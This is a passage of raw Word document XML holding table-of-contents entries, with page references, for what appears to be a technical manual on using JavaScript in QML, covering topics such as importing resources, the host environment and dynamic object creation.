            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605115 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26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16" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Importing</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Resources</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>in</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605116 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27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17" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Importing a JavaScript Resource from a QML Document</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605117 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27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18" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Imports Within JavaScript Resources</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605118 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</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19" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Importing a JavaScript Resource from Another JavaScript Resource</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605119 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</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20" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Importing a QML Module from a JavaScript Resource</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605120 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</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21" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Including a JavaScript Resource from Another JavaScript Resource</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605121 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29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22" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Host Environment</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605122 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</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23" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Common Base</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605123 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</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24" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Global Object</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605124 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</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25" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Objects and Functions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605125 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</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26" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Environment Restrictions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605126 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31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27" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Global code is run in a reduced scope.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605127 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31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28" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The value of </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
            <w:noProof/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>this</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t> is currently undefined in QML in the majority of contexts.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605128 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32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29" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Dynamic QML Object Creation from JavaScript</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605129 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</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30" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Creating Objects Dynamically</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605130 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</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31" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Creating a Component Dynamically</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605131 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</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32" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Creating an Object from a String of QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605132 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</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33" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Maintaining Dynamically Created Objects</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605133 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35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34" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Deleting Objects Dynamically</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605134 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35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35" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Use Case - Integrating JavaScript in QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605135 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37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36" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using JavaScript Expressions for Property Values</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605136 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37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37" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Adding JavaScript Functions in QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605137 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
